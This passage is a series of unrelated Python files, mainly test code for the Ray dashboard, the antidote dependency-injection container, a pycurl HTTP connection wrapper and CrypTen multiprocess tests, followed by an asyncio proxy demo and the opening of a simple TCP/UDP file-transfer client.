ex_stack = "".join(ex_stack)
raise Exception(f"Timed out while testing, {ex_stack}")
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_multi_nodes_info(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
cluster: Cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = cluster.webui_url
webui_url = format_web_url(webui_url)
cluster.add_node()
cluster.add_node()
def _check_nodes():
try:
response = requests.get(webui_url + "/nodes?view=summary")
response.raise_for_status()
summary = response.json()
assert summary["result"] is True, summary["msg"]
summary = summary["data"]["summary"]
assert len(summary) == 3
for node_info in summary:
node_id = node_info["raylet"]["nodeId"]
response = requests.get(webui_url + f"/nodes/{node_id}")
response.raise_for_status()
detail = response.json()
assert detail["result"] is True, detail["msg"]
detail = detail["data"]["detail"]
assert detail["raylet"]["state"] == "ALIVE"
response = requests.get(webui_url + "/test/dump?key=agents")
response.raise_for_status()
agents = response.json()
assert len(agents["data"]["agents"]) == 3
return True
except Exception as ex:
logger.info(ex)
return False
wait_for_condition(_check_nodes, timeout=15)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_multi_node_churn(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
cluster: Cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = format_web_url(cluster.webui_url)
def cluster_chaos_monkey():
worker_nodes = []
while True:
time.sleep(5)
if len(worker_nodes) < 2:
worker_nodes.append(cluster.add_node())
continue
should_add_node = random.randint(0, 1)
if should_add_node:
worker_nodes.append(cluster.add_node())
else:
node_index = random.randrange(0, len(worker_nodes))
node_to_remove = worker_nodes.pop(node_index)
cluster.remove_node(node_to_remove)
def get_index():
resp = requests.get(webui_url)
resp.raise_for_status()
def get_nodes():
resp = requests.get(webui_url + "/nodes?view=summary")
resp.raise_for_status()
summary = resp.json()
assert summary["result"] is True, summary["msg"]
assert summary["data"]["summary"]
t = threading.Thread(target=cluster_chaos_monkey, daemon=True)
t.start()
t_st = datetime.now()
duration = timedelta(seconds=60)
while datetime.now() < t_st + duration:
get_index()
time.sleep(2)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_logs(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = cluster.webui_url
webui_url = format_web_url(webui_url)
nodes = ray.nodes()
assert len(nodes) == 1
node_ip = nodes[0]["NodeManagerAddress"]
@ray.remote
class LoggingActor:
def go(self, n):
i = 0
while i < n:
print(f"On number {i}")
i += 1
def get_pid(self):
return os.getpid()
la = LoggingActor.remote()
la2 = LoggingActor.remote()
la_pid = str(ray.get(la.get_pid.remote()))
la2_pid = str(ray.get(la2.get_pid.remote()))
ray.get(la.go.remote(4))
ray.get(la2.go.remote(1))
def check_logs():
node_logs_response = requests.get(
f"{webui_url}/node_logs", params={"ip": node_ip})
node_logs_response.raise_for_status()
node_logs = node_logs_response.json()
assert node_logs["result"]
assert type(node_logs["data"]["logs"]) is dict
assert all(
pid in node_logs["data"]["logs"] for pid in (la_pid, la2_pid))
assert len(node_logs["data"]["logs"][la2_pid]) == 1
actor_one_logs_response = requests.get(
f"{webui_url}/node_logs",
params={
"ip": node_ip,
"pid": str(la_pid)
})
actor_one_logs_response.raise_for_status()
actor_one_logs = actor_one_logs_response.json()
assert actor_one_logs["result"]
assert type(actor_one_logs["data"]["logs"]) is dict
assert len(actor_one_logs["data"]["logs"][la_pid]) == 4
wait_until_succeeded_without_exception(
check_logs, (AssertionError), timeout_ms=1000)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_errors(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = cluster.webui_url
webui_url = format_web_url(webui_url)
nodes = ray.nodes()
assert len(nodes) == 1
node_ip = nodes[0]["NodeManagerAddress"]
@ray.remote
class ErrorActor():
def go(self):
raise ValueError("This is an error")
def get_pid(self):
return os.getpid()
ea = ErrorActor.remote()
ea_pid = ea.get_pid.remote()
ea.go.remote()
def check_errs():
node_errs_response = requests.get(
f"{webui_url}/node_logs", params={"ip": node_ip})
node_errs_response.raise_for_status()
node_errs = node_errs_response.json()
assert node_errs["result"]
assert type(node_errs["data"]["errors"]) is dict
assert ea_pid in node_errs["data"]["errors"]
assert len(node_errs["data"]["errors"][ea_pid]) == 1
actor_err_response = requests.get(
f"{webui_url}/node_logs",
params={
"ip": node_ip,
"pid": str(ea_pid)
})
actor_err_response.raise_for_status()
actor_errs = actor_err_response.json()
assert actor_errs["result"]
assert type(actor_errs["data"]["errors"]) is dict
assert len(actor_errs["data"]["errors"][ea_pid]) == 4
wait_until_succeeded_without_exception(
check_errs, (AssertionError), timeout_ms=1000)
def test_nil_node(enable_test_module, disable_aiohttp_cache,
ray_start_with_dashboard):
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"])
is True)
webui_url = ray_start_with_dashboard["webui_url"]
assert wait_until_server_available(webui_url)
webui_url = format_web_url(webui_url)
@ray.remote(num_gpus=1)
class InfeasibleActor:
pass
infeasible_actor = InfeasibleActor.remote() # noqa
timeout_seconds = 5
start_time = time.time()
last_ex = None
while True:
time.sleep(1)
try:
resp = requests.get(f"{webui_url}/logical/actors")
resp_json = resp.json()
resp_data = resp_json["data"]
actors = resp_data["actors"]
assert len(actors) == 1
response = requests.get(webui_url + "/test/dump?key=node_actors")
response.raise_for_status()
result = response.json()
assert stats_collector_consts.NIL_NODE_ID not in result["data"][
"nodeActors"]
break
except Exception as ex:
last_ex = ex
finally:
if time.time() > start_time + timeout_seconds:
ex_stack = traceback.format_exception(
type(last_ex), last_ex,
last_ex.__traceback__) if last_ex else []
ex_stack = "".join(ex_stack)
raise Exception(f"Timed out while testing, {ex_stack}")
def test_actor_pubsub(disable_aiohttp_cache, ray_start_with_dashboard):
timeout = 5
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"])
is True)
address_info = ray_start_with_dashboard
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
p = client.pubsub(ignore_subscribe_messages=True)
p.psubscribe(ray.gcs_utils.RAY_ACTOR_PUBSUB_PATTERN)
@ray.remote
class DummyActor:
def __init__(self):
pass
# Create a dummy actor.
a = DummyActor.remote()
def handle_pub_messages(client, msgs, timeout, expect_num):
start_time = time.time()
while time.time() - start_time < timeout and len(msgs) < expect_num:
msg = client.get_message()
if msg is None:
time.sleep(0.01)
continue
pubsub_msg = ray.gcs_utils.PubSubMessage.FromString(msg["data"])
actor_data = ray.gcs_utils.ActorTableData.FromString(
pubsub_msg.data)
msgs.append(actor_data)
msgs = []
handle_pub_messages(p, msgs, timeout, 2)
# Assert we received published actor messages with state
# DEPENDENCIES_UNREADY and ALIVE.
assert len(msgs) == 2
# Kill actor.
ray.kill(a)
handle_pub_messages(p, msgs, timeout, 3)
# Assert we received published actor messages with state DEAD.
assert len(msgs) == 3
def actor_table_data_to_dict(message):
return dashboard_utils.message_to_dict(
message, {
"actorId", "parentId", "jobId", "workerId", "rayletId",
"actorCreationDummyObjectId", "callerId", "taskId",
"parentTaskId", "sourceActorId", "placementGroupId"
},
including_default_value_fields=False)
non_state_keys = ("actorId", "jobId", "taskSpec")
for msg in msgs:
actor_data_dict = actor_table_data_to_dict(msg)
# DEPENDENCIES_UNREADY is 0, which would not be kept in the dict. We
# need to check its original value.
if msg.state == 0:
assert len(actor_data_dict) > 5
for k in non_state_keys:
assert k in actor_data_dict
# For status that is not DEPENDENCIES_UNREADY, only states fields will
# be published.
elif actor_data_dict["state"] in ("ALIVE", "DEAD"):
assert actor_data_dict.keys() == {
"state", "address", "timestamp", "pid", "creationTaskException"
}
else:
raise Exception("Unknown state: {}".format(
actor_data_dict["state"]))
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
|
test_thread_safety.py
|
import random
import threading
import time
import pytest
from antidote import Tagged, factory, new_container
from antidote.core import DependencyContainer
from antidote.providers.tag import TaggedDependencies
class Service:
pass
class AnotherService:
pass
def make_delayed_factory(service, a=0.01, b=0.01):
def f() -> service:
time.sleep(a + b * random.random())
return service()
return f
@pytest.fixture()
def container():
c = new_container()
c.update_singletons({Service: Service(), 'parameter': object()})
return c
def multi_thread_do(target, n_threads=10):
threads = [threading.Thread(target=target)
for _ in range(n_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def test_container_instantiation_safety(container: DependencyContainer):
n_threads = 10
factory(make_delayed_factory(Service),
singleton=True,
container=container)
factory(make_delayed_factory(AnotherService),
singleton=False,
container=container)
singleton_got = []
non_singleton_got = []
def worker():
singleton_got.append(container.get(Service))
non_singleton_got.append(container.get(AnotherService))
multi_thread_do(worker, n_threads)
assert 1 == len(set(singleton_got))
assert n_threads == len(set(non_singleton_got))
def test_tagged_dependencies_instantiation_safety(container: DependencyContainer):
n_dependencies = 40
for i in range(n_dependencies):
factory(make_delayed_factory(type('Service{}'.format(i), (object,), {})),
singleton=False,
tags=['test'],
container=container)
tagged = container.get(Tagged('test')) # type: TaggedDependencies
dependencies = []
def worker():
for i, dep in enumerate(tagged.instances()):
dependencies.append((i, dep))
multi_thread_do(worker)
assert n_dependencies == len(set(dependencies))
assert set(dependencies) == set(enumerate(tagged.instances()))
|
test_curlhttpconnection.py
|
"""Unit tests for CurlHTTPConnections."""
from cStringIO import StringIO
import unittest
import BaseHTTPServer
import threading
import tempfile
import pycurl
from friendly_curl import CurlHTTPConnection
from friendly_curl import CurlHTTPResponse
try:
import httplib2
except ImportError:
httplib2 = None
class TestCurlHTTPConnection(unittest.TestCase):
def testSuccessfulGet(self):
"""Test a basic get request"""
con = CurlHTTPConnection('127.0.0.1', 6110)
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_GET(self):
self.test_object.request_handler = self
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
con.request('GET', '/index.html?foo=bar')
resp = con.getresponse()
self.assertEqual(resp.status, 200, 'Unexpected HTTP status.')
self.assertEqual(resp.getheader('content-type'), 'text/html',
'Unexpected Content-Type from server.')
self.assertEqual(resp.read(), 'This is a test line.\n',
'Incorrect content returned by server.')
self.assertEqual(self.request_handler.path, '/index.html?foo=bar',
'Incorrect path on server.')
thread.join()
def testSuccessfulGetWithHeaders(self):
"""Test a basic get request with headers"""
con = CurlHTTPConnection('127.0.0.1', 6110)
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_GET(self):
self.test_object.request_handler = self
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
con.request('GET', '/index.html?foo=bar', headers={'SHAZAM': 'Marvellous'})
resp = con.getresponse()
self.assertEqual(self.request_handler.headers['SHAZAM'], 'Marvellous',
'Test request header not found on server.')
thread.join()
def testErrorGet(self):
"""Test a get request that causes an error"""
con = CurlHTTPConnection('127.0.0.1', 6110)
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_GET(self):
self.test_object.request_handler = self
self.send_error(404)
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
con.request('GET', '/index.html?foo=bar')
resp = con.getresponse()
self.assertEqual(resp.status, 404, 'Unexpected HTTP status.')
self.assertEqual(resp.getheader('content-type'), 'text/html',
'Unexpected Content-Type from server.')
self.assert_('<p>Error code 404.' in resp.read(),
'Unexpected error document from server.')
self.assertEqual(self.request_handler.path, '/index.html?foo=bar',
'Incorrect path on server.')
thread.join()
def testPostData(self):
"""Test a basic post request"""
con = CurlHTTPConnection('127.0.0.1', 6110)
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_POST(self):
self.test_object.request_handler = self
self.test_object.post_content = \
self.rfile.read(int(self.headers['content-length']))
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
# Do this here so test_thread sees it after it drops out of
# handle_request after curl makes its request.
runThread = False
con.request('POST', '/post_target', body='foo=bar&baz=garply\r\n')
resp = con.getresponse()
self.assertEqual(self.request_handler.headers['content-length'], '20')
self.assertEqual(self.post_content, 'foo=bar&baz=garply\r\n',
'Incorrect data on server.')
self.assertEqual(self.request_handler.path, '/post_target',
'Incorrect path on server.')
thread.join()
def testPutData(self):
"""Test a basic put request"""
con = CurlHTTPConnection('127.0.0.1', 6110)
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_PUT(self):
self.test_object.request_handler = self
# CURL's put uses transfer-encoding chunked by default.
chunk_size = int(self.rfile.readline(), 16)
self.test_object.put_content = \
self.rfile.read(int(self.headers['content-length']))
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
con.request('PUT', '/put_target', body='foo=bar&baz=garply\r\n')
resp = con.getresponse()
self.assertEqual(self.request_handler.headers['content-length'], '20')
self.assertEqual(self.put_content, 'foo=bar&baz=garply\r\n',
'Incorrect data on server.')
self.assertEqual(self.request_handler.path, '/put_target',
'Incorrect path on server.')
thread.join()
def testDelete(self):
"""Test a delete request"""
con = CurlHTTPConnection('127.0.0.1', 6110)
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_DELETE(self):
self.test_object.request_handler = self
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
con.request('DELETE', '/del_target')
resp = con.getresponse()
self.assertEqual(self.request_handler.path, '/del_target',
'Incorrect path on server.')
thread.join()
def testHttpLib2GET(self):
"""Test integration with httplib2 when making a GET request."""
if httplib2:
httpcon = httplib2.Http()
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_GET(self):
self.test_object.request_handler = self
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
(resp, content) = httpcon.request(
uri='http://localhost:6110/index.html?foo=bar',
method='GET', connection_type=CurlHTTPConnection)
self.assertEqual(resp.status, 200, 'Unexpected HTTP status.')
self.assertEqual(resp['content-type'], 'text/html',
'Unexpected Content-Type from server.')
self.assertEqual(content, 'This is a test line.\n',
'Incorrect content returned by server.')
self.assertEqual(self.request_handler.path, '/index.html?foo=bar',
'Incorrect path on server.')
thread.join()
def testHttpLib2GETHeaders(self):
"""Test integration with httplib2 by making a get request with headers."""
if httplib2:
httpcon = httplib2.Http()
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_GET(self):
self.test_object.request_handler = self
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
(resp, content) = httpcon.request(
uri='http://127.0.0.1:6110/index.html?foo=bar', method='GET',
headers={'SHAZAM': 'Marvellous'},
connection_type=CurlHTTPConnection)
self.assertEqual(self.request_handler.headers['SHAZAM'], 'Marvellous',
'Test request header not found on server.')
thread.join()
def testHttpLib2POST(self):
"""Test a post request through httplib2."""
if httplib2:
httpcon = httplib2.Http()
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_POST(self):
self.test_object.request_handler = self
self.test_object.post_content = \
self.rfile.read(int(self.headers['content-length']))
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
(resp, content) = httpcon.request(
uri='http://127.0.0.1:6110/post_target', method='POST',
body='foo=bar&baz=garply\r\n', connection_type=CurlHTTPConnection)
self.assertEqual(self.request_handler.headers['content-length'], '20')
self.assertEqual(self.post_content, 'foo=bar&baz=garply\r\n',
'Incorrect data on server.')
self.assertEqual(self.request_handler.path, '/post_target',
'Incorrect path on server.')
thread.join()
def testHttpLib2PUT(self):
"""Test a put request through httplib2"""
if httplib2:
httpcon = httplib2.Http()
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_PUT(self):
self.test_object.request_handler = self
# CURL's put uses transfer-encoding chunked by default.
chunk_size = int(self.rfile.readline(), 16)
self.test_object.put_content = \
self.rfile.read(int(self.headers['content-length']))
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
(resp, content) = httpcon.request(
uri='http://127.0.0.1:6110/put_target', method='PUT',
body='foo=bar&baz=garply\r\n', connection_type=CurlHTTPConnection)
self.assertEqual(self.request_handler.headers['content-length'], '20')
self.assertEqual(self.put_content, 'foo=bar&baz=garply\r\n',
'Incorrect data on server.')
self.assertEqual(self.request_handler.path, '/put_target',
'Incorrect path on server.')
thread.join()
def testHttpLib2DELETE(self):
"""Test a delete request"""
if httplib2:
httpcon = httplib2.Http()
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_DELETE(self):
self.test_object.request_handler = self
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
# Do this here so test_thread sees it after it drops out of
# handle_request after curl makes its request.
runThread = False
httpcon.request(
uri='http://127.0.0.1:6110/del_target', method='DELETE',
connection_type=CurlHTTPConnection)
self.assertEqual(self.request_handler.path, '/del_target',
'Incorrect path on server.')
thread.join()
def testSuccessfulGetWithUnicodeUri(self):
"""Test a basic get request with a unicode object passed to con.request."""
con = CurlHTTPConnection('127.0.0.1', 6110)
class TestRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
test_object = self
def do_GET(self):
self.test_object.request_handler = self
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('This is a test line.\n')
started = threading.Event()
def test_thread():
server = BaseHTTPServer.HTTPServer(('', 6110), TestRequestHandler)
started.set()
server.handle_request()
server.server_close()
thread = threading.Thread(target=test_thread)
thread.start()
started.wait()
con.request('GET', u'/index.html?foo=bar')
resp = con.getresponse()
self.assertEqual(resp.status, 200, 'Unexpected HTTP status.')
self.assertEqual(resp.getheader('content-type'), 'text/html',
'Unexpected Content-Type from server.')
self.assertEqual(resp.read(), 'This is a test line.\n',
'Incorrect content returned by server.')
self.assertEqual(self.request_handler.path, '/index.html?foo=bar',
'Incorrect path on server.')
thread.join()
|
multiprocess_test_case.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing
import os
import sys
import tempfile
import traceback
import unittest
import warnings
from functools import wraps
import crypten.communicator as comm
import crypten.debug
import torch
import torch.distributed as dist
def get_random_test_tensor(
max_value=6, min_value=None, size=(1, 5), is_float=False, ex_zero=False, device=None
):
"""Generates random tensor for testing
Args:
max_value (int): defines maximum value for int tensor
min_value (int): defines minimum value for int tensor
size (tuple): size of tensor
is_float (bool): determines float or int tensor
ex_zero (bool): excludes zero tensor
Returns: torch.tensor
"""
if min_value is None:
min_value = -max_value
if is_float:
tensor = (
torch.rand(torch.Size(size), device=device) * (max_value - min_value)
+ min_value
)
else:
tensor = torch.randint(
min_value, max_value, torch.Size(size), dtype=torch.int64, device=device
)
if ex_zero:
# replace 0 with 1
tensor[tensor == 0] = 1
# Broadcast this tensor to the world so that the generated random tensor
# is in sync in all distributed processes. See T45688819 for more
# information.
tensor = comm.get().broadcast(tensor, 0)
return tensor
def onehot(indices, num_targets=None):
"""
Converts index vector into one-hot matrix.
"""
assert indices.dtype == torch.long, "indices must be long integers"
assert indices.min() >= 0, "indices must be non-negative"
if num_targets is None:
num_targets = indices.max() + 1
onehot_vector = torch.zeros(indices.nelement(), num_targets, dtype=torch.long)
onehot_vector.scatter_(1, indices.view(indices.nelement(), 1), 1)
return onehot_vector
def get_random_linear(in_channels, out_channels):
linear = torch.nn.Linear(in_channels, out_channels)
if dist.is_initialized():
# Broadcast this tensor to the world so that the generated random tensor
# is in sync in all distributed processes. See T45688819 for more
# information.
comm.get().broadcast(linear.weight, 0)
comm.get().broadcast(linear.bias, 0)
return linear
class MultiProcessTestCase(unittest.TestCase):
MAIN_PROCESS_RANK = -1
DEFAULT_DEVICE = "cpu"
@property
def world_size(self):
return 2
@staticmethod
def join_or_run(fn):
@wraps(fn)
def wrapper(self):
if self.rank == self.MAIN_PROCESS_RANK:
self._join_processes(fn)
else:
fn(self)
return wrapper
# The main process spawns N subprocesses that run the test.
    # This function overwrites every test function to either
# assume the role of the main process and join its subprocesses,
# or run the underlying test function.
@classmethod
def setUpClass(cls):
for attr in dir(cls):
if attr.startswith("test"):
fn = getattr(cls, attr)
setattr(cls, attr, cls.join_or_run(fn))
def __init__(self, methodName):
super().__init__(methodName)
self.device = torch.device(self.DEFAULT_DEVICE)
self.rank = self.MAIN_PROCESS_RANK
self.mp_context = multiprocessing.get_context("spawn")
def setUp(self):
super(MultiProcessTestCase, self).setUp()
crypten.debug.configure_logging()
self.default_tolerance = 0.5
self.queue = self.mp_context.Queue()
        # This gets called in the child processes as well to give subclasses a
        # chance to initialize themselves in the new process
if self.rank == self.MAIN_PROCESS_RANK:
self.file = tempfile.NamedTemporaryFile(delete=True).name
self.processes = [
self._spawn_process(rank) for rank in range(int(self.world_size))
]
if crypten.mpc.ttp_required():
self.processes += [self._spawn_ttp()]
def tearDown(self):
super(MultiProcessTestCase, self).tearDown()
for p in self.processes:
p.terminate()
def _current_test_name(self):
# self.id() == e.g. '__main__.TestDistributed.TestAdditive.test_get_rank'
return self.id().split(".")[-1]
def _spawn_ttp(self):
communicator_args = {
"WORLD_SIZE": self.world_size,
"RANK": self.world_size,
"RENDEZVOUS": "file://%s" % self.file,
"BACKEND": "gloo",
}
for key, val in communicator_args.items():
os.environ[key] = str(val)
process = self.mp_context.Process(
target=crypten.mpc.provider.TTPServer, name="TTP", args=()
)
process.start()
return process
def _spawn_process(self, rank):
name = "Process " + str(rank)
test_name = self._current_test_name()
process = self.mp_context.Process(
target=self.__class__._run,
name=name,
args=(test_name, rank, self.file, self.queue),
)
process.start()
return process
@classmethod
def _run(cls, test_name, rank, file, exception_queue):
self = cls(test_name)
self.file = file
self.rank = int(rank)
# set environment variables:
communicator_args = {
"WORLD_SIZE": self.world_size,
"RANK": self.rank,
"RENDEZVOUS": "file://%s" % self.file,
"BACKEND": "gloo",
}
for key, val in communicator_args.items():
os.environ[key] = str(val)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
crypten.init()
self.setUp()
# We're retrieving a corresponding test and executing it.
try:
getattr(self, test_name)()
exception_queue.put(None)
except BaseException:
tb_string = traceback.format_exc()
exception_queue.put(tb_string)
crypten.uninit()
sys.exit(0)
def _join_processes(self, fn):
exceptions = {}
for p in self.processes:
p.join()
if not self.queue.empty():
tb = self.queue.get()
if tb is not None:
exceptions[p.name] = tb
test_name = str(self.__class__).split("'")[1]
test_name += f".{self._current_test_name()}"
msg = f"\n\n\n~ Test {test_name} failed ~"
msg += "\n===========\nExceptions:\n===========\n"
for name, tb in exceptions.items():
msg += f"** {name} ** :\n{tb}\n"
self.assertEqual(len(exceptions), 0, msg)
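# Illustrative sketch (not part of the original module): a subclass whose test
# body runs once in every spawned party; failures raised in each process are
# collected and re-reported by _join_processes() above. Assumes the CrypTen
# communicator exposes get_world_size(), as used elsewhere in CrypTen tests.
#
#     class TestExample(MultiProcessTestCase):
#         def test_world_size(self):
#             self.assertEqual(comm.get().get_world_size(), self.world_size)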
|
proxy.py
|
#! /usr/bin/env python3.6
import asyncio
import contextlib
import logging
import threading
import time
# Singleton class where class variables will only be instantiated once.
class Proxy:
# Class variable
_host: str = None
_port: int = None
_loop: asyncio.AbstractEventLoop = None
_queue: asyncio.Queue = None
_thread: threading.Thread = None
@staticmethod
async def worker() -> None:
""" This forever-running worker needs to be handled when exiting asyncio loop. """
while True:
logging.debug(f'worker running...')
logging.debug(f'queue size: {Proxy._queue.qsize()}')
msg = await Proxy._queue.get()
# time.sleep(0.5)
logging.info(f'msg processed: {msg}')
Proxy._queue.task_done()
@staticmethod
def background_loop() -> None:
""" Main function in new thread. """
asyncio.set_event_loop(Proxy._loop)
logging.debug(f'background loop running in child thread, thread id: {threading.get_ident()}')
asyncio.ensure_future(Proxy.worker())
# loop runs forever
Proxy._loop.run_forever()
def __new__(self):
if not hasattr(self, 'instance'):
logging.debug(f'Creating Proxy from thread: {threading.get_ident()}')
Proxy._loop = asyncio.new_event_loop() if not Proxy._loop else Proxy._loop
Proxy._queue = asyncio.Queue(loop=Proxy._loop) \
if not Proxy._queue else Proxy._queue
Proxy._thread = threading.Thread(target=Proxy.background_loop) \
if not Proxy._thread else Proxy._thread
self.instance = super().__new__(self)
else:
logging.debug(f'Proxy is already created; no action done.')
return self.instance
def __init__(self, host: str='127.0.0.1',
port: int=1688,
debug: bool=False) -> None:
Proxy._host = host if not Proxy._host else Proxy._host
Proxy._port = port if not Proxy._port else Proxy._port
@staticmethod
def _send(data: str) -> None:
logging.debug(f'Sending data in child thread: {threading.get_ident()}')
Proxy._queue.put_nowait(data)
@staticmethod
def send(data: str) -> None:
if not Proxy._loop.is_running():
logging.debug('Starting thread.')
Proxy._thread.start()
logging.debug('Sending data from main thread in unblocking fashion.')
Proxy._loop.call_soon_threadsafe(Proxy._send, data)
@staticmethod
async def exit() -> None:
""" Stop the loop gracefully. """
# Wait until all messages in queue are processed
logging.debug(f'Waiting for queue to join.')
await Proxy._queue.join()
for task in asyncio.Task.all_tasks(loop=Proxy._loop):
task.cancel()
with contextlib.suppress(asyncio.CancelledError):
logging.debug(f'task: {task}')
await task
logging.debug('Stop loop')
Proxy._loop.stop()
@staticmethod
def stop() -> None:
if Proxy._loop.is_running():
logging.debug(f'Terminating new thread and loop from thread: {threading.get_ident()}')
logging.debug(f'loop: {Proxy._loop}')
asyncio.run_coroutine_threadsafe(Proxy.exit(), loop=Proxy._loop)
Proxy._thread.join()
logging.debug('All done.')
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s [%(levelname)s]: %(message)s', level=logging.DEBUG)
logging.addLevelName(logging.DEBUG, "\033[0;32m%s\033[0m" % logging.getLevelName(logging.DEBUG))
logging.debug(f'Main thread id: {threading.get_ident()}')
pro1 = Proxy()
pro2 = Proxy()
for index in range(10):
pro1.send(f'Proxy1 says hello with index: {index}')
pro2.send(f'Proxy2 says hello with index: {index}')
# time.sleep(3)
# Proxy.stop()
pro1.stop()
pro2.stop()
|
testclient.py
|
# Python 3
# Usage: python3 UDPClient3.py localhost 12000
# coding: utf-8
import sys
from socket import *
import threading
import time
import datetime as dt
# The argument of client
servername = sys.argv[1]
serverPort = sys.argv[2]
udpPort = sys.argv[3]
serverPort = int(serverPort)
# Create the TCP socket
clientSocket = socket(AF_INET, SOCK_STREAM)
clientSocket.connect((servername, serverPort))
# Create the UDP socket
hostname = gethostname()
local_ip = gethostbyname(hostname)
portnum = int(udpPort)
udpsock = socket(AF_INET, SOCK_DGRAM)
udpsock.bind((local_ip, portnum))
# Start a thread for UDP transfer
def udprec():
    while True:
        # We receive the filename first
        l, addr = udpsock.recvfrom(1024)
        filename = l.decode('utf-8')
        # Then receive the file contents and append them to the file
        l, addr = udpsock.recvfrom(1024)
        while l:
            f = open(filename, 'ab')
            f.write(l)
            f.close()
            l, addr = udpsock.recvfrom(1024)
thread = threading.Thread(target=udprec)
thread.start()
# This is the authentication function
